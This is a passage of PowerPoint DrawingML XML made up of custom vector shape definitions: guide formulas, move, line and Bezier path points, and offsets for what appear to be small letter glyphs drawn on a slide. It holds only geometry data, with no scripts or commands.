                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                        <a:pt x="15" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="11"/>
                        <a:pt x="16" y="10"/>
                        <a:pt x="16" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="7"/>
                        <a:pt x="15" y="6"/>
                        <a:pt x="15" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="10" y="1"/>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52"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9798050" y="4627563"/>
                  <a:ext cx="30163" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 19"/>
                    <a:gd name="T1" fmla="*/ 23 h 23"/>
                    <a:gd name="T2" fmla="*/ 0 w 19"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 1 w 19"/>
                    <a:gd name="T5" fmla="*/ 0 h 23"/>
                    <a:gd name="T6" fmla="*/ 16 w 19"/>
                    <a:gd name="T7" fmla="*/ 18 h 23"/>
                    <a:gd name="T8" fmla="*/ 16 w 19"/>
                    <a:gd name="T9" fmla="*/ 0 h 23"/>
                    <a:gd name="T10" fmla="*/ 19 w 19"/>
                    <a:gd name="T11" fmla="*/ 0 h 23"/>
                    <a:gd name="T12" fmla="*/ 19 w 19"/>
                    <a:gd name="T13" fmla="*/ 23 h 23"/>
                    <a:gd name="T14" fmla="*/ 19 w 19"/>
                    <a:gd name="T15" fmla="*/ 23 h 23"/>
                    <a:gd name="T16" fmla="*/ 3 w 19"/>
                    <a:gd name="T17" fmla="*/ 5 h 23"/>
                    <a:gd name="T18" fmla="*/ 3 w 19"/>
                    <a:gd name="T19" fmla="*/ 23 h 23"/>
                    <a:gd name="T20" fmla="*/ 0 w 19"/>
                    <a:gd name="T2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3">
                      <a:moveTo>
                        <a:pt x="0" y="23"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="23"/>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53"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9836150" y="4627563"/>
                  <a:ext cx="22225" cy="36513"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 14 w 14"/>
                    <a:gd name="T3" fmla="*/ 0 h 23"/>
                    <a:gd name="T4" fmla="*/ 14 w 14"/>
                    <a:gd name="T5" fmla="*/ 2 h 23"/>
                    <a:gd name="T6" fmla="*/ 3 w 14"/>
                    <a:gd name="T7" fmla="*/ 2 h 23"/>
                    <a:gd name="T8" fmla="*/ 3 w 14"/>
                    <a:gd name="T9" fmla="*/ 10 h 23"/>
                    <a:gd name="T10" fmla="*/ 14 w 14"/>
                    <a:gd name="T11" fmla="*/ 10 h 23"/>
                    <a:gd name="T12" fmla="*/ 14 w 14"/>
                    <a:gd name="T13" fmla="*/ 11 h 23"/>
                    <a:gd name="T14" fmla="*/ 3 w 14"/>
                    <a:gd name="T15" fmla="*/ 11 h 23"/>
                    <a:gd name="T16" fmla="*/ 3 w 14"/>
                    <a:gd name="T17" fmla="*/ 21 h 23"/>
                    <a:gd name="T18" fmla="*/ 14 w 14"/>
                    <a:gd name="T19" fmla="*/ 21 h 23"/>
                    <a:gd name="T20" fmla="*/ 14 w 14"/>
                    <a:gd name="T21" fmla="*/ 23 h 23"/>
                    <a:gd name="T22" fmla="*/ 0 w 14"/>
                    <a:gd name="T23" fmla="*/ 23 h 23"/>
                    <a:gd name="T24" fmla="*/ 0 w 14"/>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3">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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54"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9302750" y="4559301"/>
                  <a:ext cx="28575" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 0 h 24"/>
                    <a:gd name="T2" fmla="*/ 3 w 18"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 3 w 18"/>
                    <a:gd name="T5" fmla="*/ 9 h 24"/>
                    <a:gd name="T6" fmla="*/ 15 w 18"/>
                    <a:gd name="T7" fmla="*/ 9 h 24"/>
                    <a:gd name="T8" fmla="*/ 15 w 18"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 18 w 18"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 18 w 18"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 15 w 18"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 15 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 24"/>
                    <a:gd name="T18" fmla="*/ 3 w 18"/>
                    <a:gd name="T19" fmla="*/ 12 h 24"/>
                    <a:gd name="T20" fmla="*/ 3 w 18"/>
                    <a:gd name="T21" fmla="*/ 24 h 24"/>
                    <a:gd name="T22" fmla="*/ 0 w 18"/>
                    <a:gd name="T23" fmla="*/ 24 h 24"/>
                    <a:gd name="T24" fmla="*/ 0 w 18"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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55"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9336088" y="4559301"/>
                  <a:ext cx="26988" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17"/>
                    <a:gd name="T1" fmla="*/ 0 h 24"/>
                    <a:gd name="T2" fmla="*/ 3 w 17"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 9 w 17"/>
                    <a:gd name="T5" fmla="*/ 9 h 24"/>
                    <a:gd name="T6" fmla="*/ 14 w 17"/>
                    <a:gd name="T7" fmla="*/ 0 h 24"/>
                    <a:gd name="T8" fmla="*/ 17 w 17"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 10 w 17"/>
                    <a:gd name="T11" fmla="*/ 12 h 24"/>
                    <a:gd name="T12" fmla="*/ 10 w 17"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 9 w 17"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 9 w 17"/>
                    <a:gd name="T17" fmla="*/ 12 h 24"/>
                    <a:gd name="T18" fmla="*/ 0 w 17"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="1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56"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9366250" y="4557713"/>
                  <a:ext cx="22225" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 10"/>
                    <a:gd name="T1" fmla="*/ 14 h 17"/>
                    <a:gd name="T2" fmla="*/ 2 w 10"/>
                    <a:gd name="T3" fmla="*/ 13 h 17"/>
                    <a:gd name="T4" fmla="*/ 5 w 10"/>
                    <a:gd name="T5" fmla="*/ 15 h 17"/>
                    <a:gd name="T6" fmla="*/ 7 w 10"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 10"/>
                    <a:gd name="T9" fmla="*/ 14 h 17"/>
                    <a:gd name="T10" fmla="*/ 8 w 10"/>
                    <a:gd name="T11" fmla="*/ 13 h 17"/>
                    <a:gd name="T12" fmla="*/ 7 w 10"/>
                    <a:gd name="T13" fmla="*/ 11 h 17"/>
                    <a:gd name="T14" fmla="*/ 5 w 10"/>
                    <a:gd name="T15" fmla="*/ 9 h 17"/>
                    <a:gd name="T16" fmla="*/ 2 w 10"/>
                    <a:gd name="T17" fmla="*/ 6 h 17"/>
                    <a:gd name="T18" fmla="*/ 1 w 10"/>
                    <a:gd name="T19" fmla="*/ 4 h 17"/>
                    <a:gd name="T20" fmla="*/ 2 w 10"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 3 w 10"/>
                    <a:gd name="T23" fmla="*/ 1 h 17"/>
                    <a:gd name="T24" fmla="*/ 5 w 10"/>
                    <a:gd name="T25" fmla="*/ 0 h 17"/>
                    <a:gd name="T26" fmla="*/ 7 w 10"/>
                    <a:gd name="T27" fmla="*/ 1 h 17"/>
                    <a:gd name="T28" fmla="*/ 9 w 10"/>
                    <a:gd name="T29" fmla="*/ 3 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 10"/>
                    <a:gd name="T31" fmla="*/ 4 h 17"/>
                    <a:gd name="T32" fmla="*/ 7 w 10"/>
                    <a:gd name="T33" fmla="*/ 2 h 17"/>
                    <a:gd name="T34" fmla="*/ 5 w 10"/>
                    <a:gd name="T35" fmla="*/ 2 h 17"/>
                    <a:gd name="T36" fmla="*/ 4 w 10"/>
                    <a:gd name="T37" fmla="*/ 2 h 17"/>
                    <a:gd name="T38" fmla="*/ 3 w 10"/>
                    <a:gd name="T39" fmla="*/ 4 h 17"/>
                    <a:gd name="T40" fmla="*/ 3 w 10"/>
                    <a:gd name="T41" fmla="*/ 5 h 17"/>
                    <a:gd name="T42" fmla="*/ 4 w 10"/>
                    <a:gd name="T43" fmla="*/ 6 h 17"/>
                    <a:gd name="T44" fmla="*/ 6 w 10"/>
                    <a:gd name="T45" fmla="*/ 8 h 17"/>
                    <a:gd name="T46" fmla="*/ 9 w 10"/>
                    <a:gd name="T47" fmla="*/ 10 h 17"/>
                    <a:gd name="T48" fmla="*/ 10 w 10"/>
                    <a:gd name="T49" fmla="*/ 13 h 17"/>
                    <a:gd name="T50" fmla="*/ 8 w 10"/>
                    <a:gd name="T51" fmla="*/ 16 h 17"/>
                    <a:gd name="T52" fmla="*/ 5 w 10"/>
                    <a:gd name="T53" fmla="*/ 17 h 17"/>
                    <a:gd name="T54" fmla="*/ 2 w 10"/>
                    <a:gd name="T55" fmla="*/ 16 h 17"/>
                    <a:gd name="T56" fmla="*/ 0 w 10"/>
                    <a:gd name="T57"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 h="17">
                      <a:moveTo>
                        <a:pt x="0" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="13"/>
                        <a:pt x="2" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="4" y="15"/>
                        <a:pt x="5" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="7" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="15"/>
                        <a:pt x="7" y="14"/>
                        <a:pt x="8" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="14"/>
                        <a:pt x="8" y="13"/>
                        <a:pt x="8" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="12"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="10"/>
                        <a:pt x="6" y="10"/>
                        <a:pt x="5" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="1" y="5"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="3"/>
                        <a:pt x="1" y="3"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="1"/>
                        <a:pt x="3" y="1"/>
                        <a:pt x="3" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="5" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="2"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                        <a:pt x="8" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="2"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="4" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="5"/>
                        <a:pt x="3" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="5"/>
                        <a:pt x="4" y="6"/>
                        <a:pt x="4" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="9"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="9" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="10" y="12"/>
                        <a:pt x="10" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="14"/>
                        <a:pt x="9" y="15"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="17"/>
                        <a:pt x="6" y="17"/>
                        <a:pt x="5" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="17"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="16"/>
                        <a:pt x="1" y="15"/>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57"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9391650" y="4559301"/>
                  <a:ext cx="20638" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 2 h 24"/>
                    <a:gd name="T2" fmla="*/ 0 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 13 w 13"/>
                    <a:gd name="T7" fmla="*/ 2 h 24"/>
                    <a:gd name="T8" fmla="*/ 8 w 13"/>
                    <a:gd name="T9" fmla="*/ 2 h 24"/>
                    <a:gd name="T10" fmla="*/ 8 w 13"/>
                    <a:gd name="T11" fmla="*/ 24 h 24"/>
                    <a:gd name="T12" fmla="*/ 6 w 13"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 6 w 13"/>
                    <a:gd name="T15" fmla="*/ 2 h 24"/>
                    <a:gd name="T16" fmla="*/ 0 w 13"/>
                    <a:gd name="T17"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4">
                      <a:moveTo>
                        <a:pt x="0" y="2"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6"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58"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9417050" y="4557713"/>
                  <a:ext cx="38100" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 17"/>
                    <a:gd name="T1" fmla="*/ 0 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 17"/>
                    <a:gd name="T3" fmla="*/ 3 h 17"/>
                    <a:gd name="T4" fmla="*/ 17 w 17"/>
                    <a:gd name="T5" fmla="*/ 9 h 17"/>
                    <a:gd name="T6" fmla="*/ 14 w 17"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 17"/>
                    <a:gd name="T9" fmla="*/ 17 h 17"/>
                    <a:gd name="T10" fmla="*/ 2 w 17"/>
                    <a:gd name="T11" fmla="*/ 15 h 17"/>
                    <a:gd name="T12" fmla="*/ 0 w 17"/>
                    <a:gd name="T13" fmla="*/ 9 h 17"/>
                    <a:gd name="T14" fmla="*/ 1 w 17"/>
                    <a:gd name="T15" fmla="*/ 4 h 17"/>
                    <a:gd name="T16" fmla="*/ 4 w 17"/>
                    <a:gd name="T17" fmla="*/ 1 h 17"/>
                    <a:gd name="T18" fmla="*/ 8 w 17"/>
                    <a:gd name="T19" fmla="*/ 0 h 17"/>
                    <a:gd name="T20" fmla="*/ 8 w 17"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 5 w 17"/>
                    <a:gd name="T23" fmla="*/ 3 h 17"/>
                    <a:gd name="T24" fmla="*/ 2 w 17"/>
                    <a:gd name="T25" fmla="*/ 5 h 17"/>
                    <a:gd name="T26" fmla="*/ 2 w 17"/>
                    <a:gd name="T27" fmla="*/ 9 h 17"/>
                    <a:gd name="T28" fmla="*/ 3 w 17"/>
                    <a:gd name="T29" fmla="*/ 13 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 17"/>
                    <a:gd name="T31" fmla="*/ 15 h 17"/>
                    <a:gd name="T32" fmla="*/ 12 w 17"/>
                    <a:gd name="T33" fmla="*/ 15 h 17"/>
                    <a:gd name="T34" fmla="*/ 14 w 17"/>
                    <a:gd name="T35" fmla="*/ 12 h 17"/>
                    <a:gd name="T36" fmla="*/ 15 w 17"/>
                    <a:gd name="T37" fmla="*/ 9 h 17"/>
                    <a:gd name="T38" fmla="*/ 14 w 17"/>
                    <a:gd name="T39" fmla="*/ 5 h 17"/>
                    <a:gd name="T40" fmla="*/ 12 w 17"/>
                    <a:gd name="T41" fmla="*/ 3 h 17"/>
                    <a:gd name="T42" fmla="*/ 8 w 17"/>
                    <a:gd name="T4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7">
                      <a:moveTo>
                        <a:pt x="8" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="13" y="1"/>
                        <a:pt x="14" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="4"/>
                        <a:pt x="17" y="6"/>
                        <a:pt x="17" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="14" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="16"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="8" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="2" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="1"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="8" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="7"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="3" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="8" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="15"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="12" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="13"/>
                        <a:pt x="14" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="11"/>
                        <a:pt x="15" y="10"/>
                        <a:pt x="15" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="6"/>
                        <a:pt x="14" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="4"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="2"/>
                        <a:pt x="9" y="2"/>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59"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9463088" y="4559301"/>
                  <a:ext cx="22225" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 10"/>
                    <a:gd name="T1" fmla="*/ 0 h 16"/>
                    <a:gd name="T2" fmla="*/ 3 w 10"/>
                    <a:gd name="T3" fmla="*/ 0 h 16"/>
                    <a:gd name="T4" fmla="*/ 7 w 10"/>
                    <a:gd name="T5" fmla="*/ 0 h 16"/>
                    <a:gd name="T6" fmla="*/ 9 w 10"/>
                    <a:gd name="T7" fmla="*/ 1 h 16"/>
                    <a:gd name="T8" fmla="*/ 10 w 10"/>
                    <a:gd name="T9" fmla="*/ 4 h 16"/>
                    <a:gd name="T10" fmla="*/ 9 w 10"/>
                    <a:gd name="T11" fmla="*/ 6 h 16"/>
                    <a:gd name="T12" fmla="*/ 8 w 10"/>
                    <a:gd name="T13" fmla="*/ 8 h 16"/>
                    <a:gd name="T14" fmla="*/ 5 w 10"/>
                    <a:gd name="T15" fmla="*/ 8 h 16"/>
                    <a:gd name="T16" fmla="*/ 10 w 10"/>
                    <a:gd name="T17" fmla="*/ 16 h 16"/>
                    <a:gd name="T18" fmla="*/ 8 w 10"/>
                    <a:gd name="T19" fmla="*/ 16 h 16"/>
                    <a:gd name="T20" fmla="*/ 3 w 10"/>
                    <a:gd name="T21" fmla="*/ 8 h 16"/>
                    <a:gd name="T22" fmla="*/ 2 w 10"/>
                    <a:gd name="T23" fmla="*/ 8 h 16"/>
                    <a:gd name="T24" fmla="*/ 2 w 10"/>
                    <a:gd name="T25" fmla="*/ 16 h 16"/>
                    <a:gd name="T26" fmla="*/ 0 w 10"/>
                    <a:gd name="T27" fmla="*/ 16 h 16"/>
                    <a:gd name="T28" fmla="*/ 0 w 10"/>
                    <a:gd name="T29" fmla="*/ 0 h 16"/>
                    <a:gd name="T30" fmla="*/ 2 w 10"/>
                    <a:gd name="T31" fmla="*/ 1 h 16"/>
                    <a:gd name="T32" fmla="*/ 2 w 10"/>
                    <a:gd name="T33" fmla="*/ 7 h 16"/>
                    <a:gd name="T34" fmla="*/ 4 w 10"/>
                    <a:gd name="T35" fmla="*/ 7 h 16"/>
                    <a:gd name="T36" fmla="*/ 7 w 10"/>
